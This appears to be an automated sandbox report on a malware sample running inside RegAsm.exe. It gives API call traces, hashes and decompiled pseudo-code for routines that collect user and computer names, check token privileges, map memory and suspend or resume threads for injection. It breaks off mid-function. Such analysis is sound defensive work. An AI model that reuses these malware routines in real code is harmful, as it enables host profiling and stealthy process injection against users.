GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,010A584F,?,?,?,?,?,00000000), ref: 010A5637
_aulldiv.NTDLL(00000000,?,54D38000,00000192), ref: 010A564D
_snwprintf.NTDLL ref: 010A5672
CreateFileMappingW.KERNELBASE(000000FF,010AA2F8,00000004,00000000,00001000,?), ref: 010A568E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010A584F,?,?,?,?), ref: 010A56A0
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 010A56B7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,010A584F,?,?,?), ref: 010A56D8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010A584F,?,?,?,?), ref: 010A56E0

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: b875bf891aada5c803a3fab3d592bc71de0d8ec44d3f0fdb967cb9ba4fdf1643
Instruction ID: a7536a2ffc69eddc076e30f7af6a9ef9924f648cf171c1b05e5d698769929c1a
Opcode Fuzzy Hash: b875bf891aada5c803a3fab3d592bc71de0d8ec44d3f0fdb967cb9ba4fdf1643
Instruction Fuzzy Hash: 5A21E476741604BFD7219FA8EC05FDE7BB9BB88790FA40121FA85EB1C0EA719901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010A57B9, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E010A57B9(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E010A43B1();
				if(_t27 != 0) {
					_t77 =  *0x10aa2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x10aa2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x10aa148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E010A3A91( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x10aa2d4; // 0x235d5a8
					_push(0x10aa2fc);
					_push(1);
					_t7 = _t32 + 0x10ab5bc; // 0x4d283a53
					 *0x10aa2f8 = 0xc;
					 *0x10aa300 = 0;
					L010A42A0();
					_t36 = E010A562B(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E010A42A6(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E010A4573(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x10aa2d4; // 0x235d5a8
								_t18 = _t64 + 0x10ab86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x10aa32c = _t87;
						}
						_t38 = E010A1612();
						 *0x10aa2c8 =  *0x10aa2c8 ^ 0xe8fa7dd7;
						 *0x10aa31c = _t38;
						_t39 = E010A4573(0x60);
						__eflags = _t39;
						 *0x10aa37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x10aa37c; // 0x3409630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x10aa37c; // 0x3409630
							 *_t56 = 0x10ab85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x10aa290, _t84, 0x52);
							__eflags = _t42;
							 *0x10aa314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x10aa2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x10aa2d4; // 0x235d5a8
								_t19 = _t76 + 0x10ab212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x10a92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E010A42A6( ~_v8 &  *0x10aa2c8, 0x10aa00c); // executed
								_t84 = E010A6B67(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E010A3E82();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E010A6664(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t84 = E010A4B80(__eflags, _t82 + 4);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x10aa14c(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E010A559F(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x010a57b9
0x010a57c4
0x010a57c7
0x010a57ca
0x010a57cd
0x010a57d4
0x010a57d6
0x010a57e2
0x010a57e4
0x010a57e4
0x010a57ed
0x010a57f5
0x010a57f8
0x010a5812
0x010a5817
0x010a5818
0x010a581a
0x010a581f
0x010a5824
0x010a5826
0x010a582d
0x010a5837
0x010a583d
0x010a584a
0x010a5851
0x010a5856
0x010a5856
0x010a585f
0x010a5888
0x010a588b
0x010a5898
0x010a589f
0x010a58ab
0x010a58ad
0x010a58af
0x010a58b4
0x010a58ba
0x010a58c0
0x010a58c6
0x010a58c9
0x010a58ce
0x010a58d6
0x010a58d8
0x010a58d8
0x010a58db
0x010a58db
0x010a58e1
0x010a58e6
0x010a58ee
0x010a58f3
0x010a58f8
0x010a58fa
0x010a58ff
0x010a592e
0x010a5901
0x010a5906
0x010a590b
0x010a5910
0x010a5917
0x010a591d
0x010a5922
0x010a5928
0x010a5928
0x010a592f
0x010a5931
0x010a5940
0x010a5946
0x010a5948
0x010a594d
0x010a5979
0x010a594f
0x010a594f
0x010a5955
0x010a5962
0x010a5968
0x010a5968
0x010a5970
0x010a5972
0x010a597a
0x010a597c
0x010a5983
0x010a5990
0x010a599a
0x010a599c
0x010a599e
0x00000000
0x00000000
0x010a59a0
0x010a59a5
0x010a59a7
0x010a59ae
0x010a59b2
0x010a59b5
0x010a59ca
0x010a59ce
0x010a59d3
0x00000000
0x010a59d3
0x010a59b7
0x010a59b9
0x00000000
0x00000000
0x010a59c4
0x010a59c6
0x010a59c8
0x00000000
0x00000000
0x00000000
0x010a59c8
0x010a59ab
0x010a59ab
0x010a597c
0x010a5861
0x010a5861
0x010a5866
0x010a59d5
0x010a59d9
0x010a59e1
0x010a59e1
0x00000000
0x010a59d9
0x010a586c
0x010a586f
0x010a586f
0x010a5871
0x010a5874
0x010a587c
0x010a5883
0x00000000
0x010a59e9
0x010a59e9
0x010a59ec
0x010a59f1
0x010a59f1

APIs

Part of subcall function 010A43B1: GetModuleHandleA.KERNEL32(4C44544E,00000000,010A57D2,?,00000000), ref: 010A43C0

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,010AA2FC,00000000), ref: 010A583D
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 010A5856
wsprintfA.USER32 ref: 010A58D6
memset.NTDLL ref: 010A5906
RtlInitializeCriticalSection.NTDLL(034095F0), ref: 010A5917
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 010A5940
wsprintfA.USER32 ref: 010A5970

Part of subcall function 010A42A6: GetUserNameW.ADVAPI32(00000000,?), ref: 010A42DD
Part of subcall function 010A42A6: RtlAllocateHeap.NTDLL(00000000,?), ref: 010A42F4
Part of subcall function 010A42A6: GetUserNameW.ADVAPI32(00000000,?), ref: 010A4301
Part of subcall function 010A42A6: HeapFree.KERNEL32(00000000,00000000,?,?,010A5995,?,00000000), ref: 010A4322
Part of subcall function 010A42A6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 010A4349
Part of subcall function 010A42A6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010A435D
Part of subcall function 010A42A6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 010A436A
Part of subcall function 010A42A6: HeapFree.KERNEL32(00000000,00000000,?,?,010A5995,?,00000000), ref: 010A4388

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 0ba989524d6e0cfe6230cf1407dae9c46f8807f7232060d5c2b20ee57eaeb18d
Instruction ID: 5ce104a4a4282dec547897484b3ce05db0e038ddbb19450823bafe84110ab42d
Opcode Fuzzy Hash: 0ba989524d6e0cfe6230cf1407dae9c46f8807f7232060d5c2b20ee57eaeb18d
Instruction Fuzzy Hash: B651E372A00615EBEB61DBE8DC45FAE77F8BB05760FD40055E9C5EB180D7BA9900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F0B588, Relevance: 10.6, APIs: 7, Instructions: 110
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03F0696A: GetProcAddress.KERNEL32(?,00000318), ref: 03F0698F
Part of subcall function 03F0696A: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 03F069AB

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 03F0B5C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03F0B6AC

Part of subcall function 03F0696A: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03F06B15

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03F0B5F7
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03F0B603
lstrcmpi.KERNEL32(?,00000000), ref: 03F0B640
StrChrA.SHLWAPI(?,0000002E), ref: 03F0B649
lstrcmpi.KERNEL32(?,00000000), ref: 03F0B65B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: 94884112cae873429996d04b784a0f1c90dd215b916e6c3a9f7ad3637010f0f1
Instruction ID: 2975f584e5d6efa6b95c394ebb7a223375a075692957e4da26c86143784e8886
Opcode Fuzzy Hash: 94884112cae873429996d04b784a0f1c90dd215b916e6c3a9f7ad3637010f0f1
Instruction Fuzzy Hash: EA316A71905316ABDB21DF19C844B2BBBE8FF88B54F040998F885A6280D774ED04DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 03F071AB, Relevance: 10.6, APIs: 7, Instructions: 84
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03F0D23A: memset.NTDLL ref: 03F0D244

OpenEventA.KERNEL32(00000002,00000000,03F2C1E4,?,00000000,00000000,?,03F14958), ref: 03F07245
SetEvent.KERNEL32(00000000,?,03F14958,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F07252
Sleep.KERNEL32(00000BB8,?,03F14958,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0725D
ResetEvent.KERNEL32(00000000,?,03F14958,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F07264
CloseHandle.KERNEL32(00000000,?,03F14958,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F0726B
GetShellWindow.USER32 ref: 03F07276
GetWindowThreadProcessId.USER32(00000000), ref: 03F0727D

Part of subcall function 03F08728: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,?,?,?,74E04D40), ref: 03F0877E
Part of subcall function 03F08728: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 03F0879A
Part of subcall function 03F08728: RegCloseKey.ADVAPI32(?), ref: 03F087AB

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Event$CloseOpenWindow$HandleProcessQueryResetShellSleepThreadValuememset
String ID:
API String ID: 937394351-0
Opcode ID: f4cb2fc2800bba18b79a4e94cda481d378f9cf9c6cac4f39910af2f5c5fb21df
Instruction ID: 2c30d6fda602148ef5ae0b86b3c19fd49abb35262128259a759e462fc5287ea5
Opcode Fuzzy Hash: f4cb2fc2800bba18b79a4e94cda481d378f9cf9c6cac4f39910af2f5c5fb21df
Instruction Fuzzy Hash: 8521FC36600218FBC231FBAAAC59E6F7B6DEFE9751F044054F909D7184DB34A404DB61

Uniqueness

Uniqueness Score: -1.00%

Function 010A29C1, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A29C1(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x10aa2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E010A4573(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E010A2625(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x010a29ce
0x010a29d5
0x010a29dc
0x010a29f0
0x010a29fb
0x010a2a13
0x010a2a20
0x010a2a23
0x010a2a28
0x010a2a33
0x010a2a37
0x010a2a46
0x010a2a4a
0x010a2a66
0x010a2a66
0x010a2a6a
0x010a2a6a
0x010a2a6f
0x010a2a73
0x010a2a79
0x010a2a7a
0x010a2a81
0x010a2a87

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 010A29F3
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 010A2A13
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 010A2A23
CloseHandle.KERNEL32(00000000), ref: 010A2A73

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 010A2A46
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 010A2A4E
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 010A2A5E

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 5a20f15fc2ebb98cc7a90ec5b010da98f4ee36e5b1714188cb3630213c3a1243
Instruction ID: f62fbb962901504e3ff1925cc22b09e78f8367ab64eb27eee8f7804a94f8e151
Opcode Fuzzy Hash: 5a20f15fc2ebb98cc7a90ec5b010da98f4ee36e5b1714188cb3630213c3a1243
Instruction Fuzzy Hash: D5215C75A00209FFEB20DFE4CC84EEEBBB9EB08304F4040A5F651A2190D7764A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A277F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E010A277F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x10aa2d4; // 0x235d5a8
				_t1 = _t9 + 0x10ab61b; // 0x253d7325
				_t36 = 0;
				_t28 = E010A6237(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x3409631
					_t40 = E010A4573(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E010A21C6(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E010A2625(_t40);
						_t42 = E010A7878(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E010A2625(_t36);
							_t36 = _t42;
						}
						_t43 = E010A2929(_t36, _t33);
						if(_t43 != 0) {
							E010A2625(_t36);
							_t36 = _t43;
						}
					}
					E010A2625(_t28);
				}
				return _t36;
			}

0x010a277f
0x010a2782
0x010a2783
0x010a278a
0x010a2791
0x010a2798
0x010a279c
0x010a27a3
0x010a27aa
0x010a27af
0x010a27b7
0x010a27c1
0x010a27c5
0x010a27c9
0x010a27cf
0x010a27d4
0x010a27de
0x010a27e4
0x010a27e6
0x010a27fd
0x010a2801
0x010a2804
0x010a2809
0x010a2809
0x010a2812
0x010a2816
0x010a2819
0x010a281e
0x010a281e
0x010a2816
0x010a2821
0x010a2826
0x010a282c

APIs

Part of subcall function 010A6237: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010A2798,253D7325,00000000,00000000,?,00000000,010A2E14), ref: 010A629E
Part of subcall function 010A6237: sprintf.NTDLL ref: 010A62BF

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27AA
lstrlen.KERNEL32(00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27B2

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

strcpy.NTDLL ref: 010A27C9
lstrcat.KERNEL32(00000000,00000000), ref: 010A27D4

Part of subcall function 010A21C6: lstrlen.KERNEL32(00000000,00000000,010A2E14,00000000,?,010A27E3,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A21D7

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A27F1

Part of subcall function 010A7878: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,010A27FD,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A7882
Part of subcall function 010A7878: _snprintf.NTDLL ref: 010A78E0

Strings

=, xrefs: 010A27EB

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 6ae1b7dc646ca5131145eda5f3e30f80a9a785b0af00ca6df0d59680d33a0239
Instruction ID: b2d195ee756296f12550badfcd3f1db8ebb5c44f9c5e3a4e311e0d9b43685a7c
Opcode Fuzzy Hash: 6ae1b7dc646ca5131145eda5f3e30f80a9a785b0af00ca6df0d59680d33a0239
Instruction Fuzzy Hash: 4711C637E02526B747236BF89C44CEE36ED9E9D5A47850075F680E7100DE79DD0287E4

Uniqueness

Uniqueness Score: -1.00%

Function 03F12AEC, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F12B0F

Part of subcall function 03F1F5F1: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4), ref: 03F1F60C
Part of subcall function 03F1F5F1: IsWow64Process.KERNEL32(?,00000000,?,00000000,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4,00000000), ref: 03F1F61D
Part of subcall function 03F1F5F1: CloseHandle.KERNEL32(?,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4,00000000,?,?,03F14958), ref: 03F1F630

ResumeThread.KERNEL32(03F017CA,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 03F12BC9
WaitForSingleObject.KERNEL32(00000064), ref: 03F12BD7
SuspendThread.KERNEL32(03F017CA), ref: 03F12BEA

Part of subcall function 03F1B38D: memset.NTDLL ref: 03F1B64E

ResumeThread.KERNELBASE(03F017CA), ref: 03F12C6D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 568453049-0
Opcode ID: 0155dcdcb5b7d0619f5bcff5de81e75daf8bd852986ff5a940d0a6c5e8fd0de5
Instruction ID: 9d0aebb57fc80a8b94340cd06293125f94522668c08a0841f36f1f980bacf634
Opcode Fuzzy Hash: 0155dcdcb5b7d0619f5bcff5de81e75daf8bd852986ff5a940d0a6c5e8fd0de5
Instruction Fuzzy Hash: F8418D3290024AFBDF21EF94EC84AAEBBB9FB04350F184865EA15D6250C772DA60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 010A5171, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010A6855: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,034089D0,010A51A1,?,?,?,?,?,?,?,?,?,?,?,010A51A1), ref: 010A6921

Part of subcall function 010A1AA3: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 010A1AE0
Part of subcall function 010A1AA3: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010A1B11

SysAllocString.OLEAUT32(?), ref: 010A51CD
SysAllocString.OLEAUT32(0070006F), ref: 010A51E1
SysAllocString.OLEAUT32(00000000), ref: 010A51F3
SysFreeString.OLEAUT32(00000000), ref: 010A5257
SysFreeString.OLEAUT32(00000000), ref: 010A5266
SysFreeString.OLEAUT32(00000000), ref: 010A5271

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 5360fb3b72396188d3c34fbee9971099cc0c3e2837311d03ab66c1388a344f8e
Instruction ID: 969b1da21b0f89349af96873734661a41a8e3d9736446f4e50b4545491303abf
Opcode Fuzzy Hash: 5360fb3b72396188d3c34fbee9971099cc0c3e2837311d03ab66c1388a344f8e
Instruction Fuzzy Hash: 86315B32D00A09AFEB41DFECC848ADEBBB6BF49300F554465FA50EB210DB769905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03F0DABD, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(03F11BE7,?,?,00000402,03F11BE7,03F28570,00000018,03F0F244,?,00000402,03F2B7A4,03F2B7A0,-0000000C,00000000), ref: 03F0DB00
VirtualProtect.KERNELBASE(00000000,00000004,03F11BE7,03F11BE7,00000000,00000004,03F11BE7,03F2B7A4,03F11BE7,?,?,00000402,03F11BE7,03F28570,00000018,03F0F244), ref: 03F0DB8B
RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F0DBB3
RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F0DBD1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 954da404e4528e3c429befd8df751172305e52567a6b0e96744fe0e0d303602f
Instruction ID: b1010488f44ab93105cc69ecd5f0daa876e509b9fcecdd44063b21a4b936e6e2
Opcode Fuzzy Hash: 954da404e4528e3c429befd8df751172305e52567a6b0e96744fe0e0d303602f
Instruction Fuzzy Hash: C0416D7590071AEFCB11EFA9C88499DFBF8FF08310B14851AE515EB2A0D7B1A950DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E53(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401F96(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BB2(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x405104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
